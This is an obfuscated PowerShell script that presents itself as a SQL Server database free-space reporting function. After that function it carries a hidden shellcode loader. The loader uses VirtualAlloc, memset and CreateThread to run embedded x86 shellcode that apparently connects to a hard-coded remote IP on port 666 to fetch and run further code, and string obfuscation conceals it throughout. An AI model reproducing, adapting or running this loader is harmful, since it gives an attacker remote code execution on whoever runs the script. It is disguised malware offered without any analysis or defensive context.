$igzaX  =[TYpE]("{1}{0}" -F 'ATh','M'); function GE`T-fr`EED`B`sPAce{
    [cmdletbinding()]
    param([parameter(vaLuEfRomPIpeLINE)][string[]] ${i`NsTaNc`eNAmE} = ("{0}{1}{2}" -f'lo','cal','host')
        ,[switch] ${iNcL`UdeS`Yst`Emdbs})
    BEGIN{
        ${ouTp`Ut} = @()
    }

    PROCESS{
        ${S`mO} = .("{2}{1}{0}" -f'ct','Obje','New-') (("{7}{5}{2}{1}{8}{0}{6}{9}{3}{4}" -f'eme','.SqlServer.Mana','ft','Smo.Ser','ver','o','nt','Micros','g','.')) ${I`NsT`AnC`ENA`me}

        try{
            if(${iN`clUde`syST`eMD`Bs}){
                ${d`BS} = ${s`Mo}."dataBA`S`ES" | .("{0}{2}{1}{3}"-f 'Whe','c','re-Obje','t') {${_}."STat`Us" -eq ("{0}{1}"-f'No','rmal')}
            } else {
                ${d`Bs} = ${s`MO}."DaTA`BAS`ES" | .("{0}{2}{3}{1}"-f 'Whe','ect','re-Ob','j') {${_}."sTA`Tus" -eq ("{0}{2}{1}"-f'N','mal','or') -and ${_}."i`sS`YSt`eMob`ject" -eq 0}
            }
        foreach(${D`B} in ${d`Bs}){
                ${o`UTP`Ut} += (${d`B}."FILE`g`RoUpS"."fIl`ES" | &("{3}{2}{0}{1}" -f 'ec','t','ect-Obj','Sel') @{('n')=("{0}{1}{2}"-f'I','nstanc','e');('e')={${iN`S`T`ANce`NaMe}}},@{('n')=("{0}{2}{1}"-f 'Datab','e','as');('e')={${db}."N`AmE"}},("{0}{1}" -f 'N','ame'),@{('n')=("{1}{0}" -f'e','Typ');('e')={("{0}{1}" -f 'Da','ta')}},("{2}{1}{0}{3}" -f 'ac','Sp','Used','e'),("{2}{1}{0}{3}"-f'c','vailableSpa','A','e'),("{0}{1}"-f 'Siz','e'),@{('n')=("{0}{1}" -f'PercUs','ed');('e')={ $igzAX::("{0}{1}"-f 'roun','d').Invoke((${_}."uSED`s`PaCe"/${_}."si`zE")*100,2)}})
                ${O`U`TPut} += (${db}."l`ogFil`ES" | &("{0}{1}{2}" -f'Select-Obj','e','ct') @{('n')=("{2}{1}{0}"-f'nce','nsta','I');('e')={${InST`An`Ce`NamE}}},@{('n')=("{0}{1}"-f'Da','tabase');('e')={${DB}."NA`Me"}},("{1}{0}" -f'e','Nam'),@{('n')=("{0}{1}" -f 'T','ype');('e')={'Log'}},("{0}{1}" -f 'Used','Space'),@{('n')=("{1}{3}{2}{0}"-f'bleSpace','A','la','vai');('e')={${_}."si`zE"-${_}."U`Se`DspaCe"}},("{0}{1}" -f'Siz','e'),@{('n')=("{2}{0}{1}"-f'cUs','ed','Per');('e')={  (  &("{0}{2}{3}{1}"-f 'Ge','bLe','T-','VariA') IgzaX -Va)::("{1}{0}" -f'nd','rou').Invoke((${_}."usedspA`cE"/${_}."SI`ZE")*100,2)}})
            }
        }
        catch{
            ${oUt`p`Ut} += &("{0}{2}{3}{1}"-f'Ne','bject','w-','O') ("{0}{1}{2}" -f 'PSO','bj','ect') -Property @{("{2}{1}{0}" -f'stance','n','I')={${InS`TAn`cENaMe}};("{2}{0}{1}"-f'atabas','e','D')=('An'+' '+'error'+' '+'o'+'ccured '+'retrei'+'ving'+' '+'data'+'ba'+'se'+' '+'i'+'nformatio'+'n '+'f'+'or '+"$InstanceName.");("{0}{1}" -f 'Per','cUsed') = -1}
        }
    }

    END{
        return ${Ou`TpUT}
    }
}
${C} = (((("{2}{43}{37}{12}{24}{27}{8}{40}{4}{41}{75}{48}{82}{62}{16}{35}{60}{49}{26}{6}{33}{38}{54}{30}{17}{15}{81}{3}{19}{0}{64}{7}{31}{83}{61}{1}{32}{14}{66}{74}{39}{51}{10}{73}{67}{28}{80}{22}{56}{58}{47}{72}{36}{52}{84}{78}{70}{68}{77}{23}{53}{9}{18}{45}{11}{29}{5}{69}{42}{50}{71}{63}{65}{20}{13}{59}{55}{46}{79}{21}{34}{44}{76}{57}{25}" -f'io','l','[DllImp','flAll','lic ','nt dwCreationFlags, IntPtr lpThreadId);','tPt','ct','{0})]',' I','xtern IntPt','p','({0}k','ntP','{0})]public','dw','ir',' ','nt','ocat','I',' u','rea','Addres','ernel32.dl','t);','In','l','tr l','Parameter, ui','t',');[D','l','r lpAdd','in','tua','t d','rt','ress','atic ','pub','sta','mport({0}msvcrt.','o','t c','Ptr l',', uin','ui','xt','oc(','dll{0})]publ','e','wSt','s,',', uin','r dest','dAttribut','un','es, ','t','lAll','ort({0}kernel32.d','tPtr V','s','nType, uint flProte','et(',' ','d(IntP','IntPt','[DllI','kSize, ','ic static extern IntPtr mem','n','r CreateThrea','st','tic e','o','r lpStart','c','t src,','pTh','Size, uint ','ern In','llImp','a'))-F  [cHAr]34));${W} = .("{2}{0}{1}"-f'T','ype','Add-') -memberDefinition ${C} -Name ("{0}{1}" -f 'Wi','n32') -namespace ("{3}{1}{0}{4}{2}" -f '32','in','s','W','Function') -passthru;[Byte[]];[Byte[]]${s`c} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0x56,0x19,0x66,0x2d,0x68,0x02,0x00,0x02,0x9a,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${s`izE} = 0x1000;if (${SC}."lEn`G`Th" -gt 0x1000){${S`IZE} = ${SC}."L`ENgth"};${X}=${w}::("{0}{2}{1}" -f 'V','rtualAlloc','i').Invoke(0,0x1000,${s`IZE},0x40);for (${i}=0;${I} -le (${S`C}."lE`NgTh"-1);${i}++) {${w}::"m`eM`Set"([IntPtr](${X}.("{0}{1}" -f'To','Int32').Invoke()+${I}), ${Sc}[${i}], 1)};${W}::("{2}{3}{0}{1}"-f'eThre','ad','Cr','eat').Invoke(0,0,${X},0,0,0);for (;;){.("{0}{1}{2}" -f 'Start','-','sleep') 60};
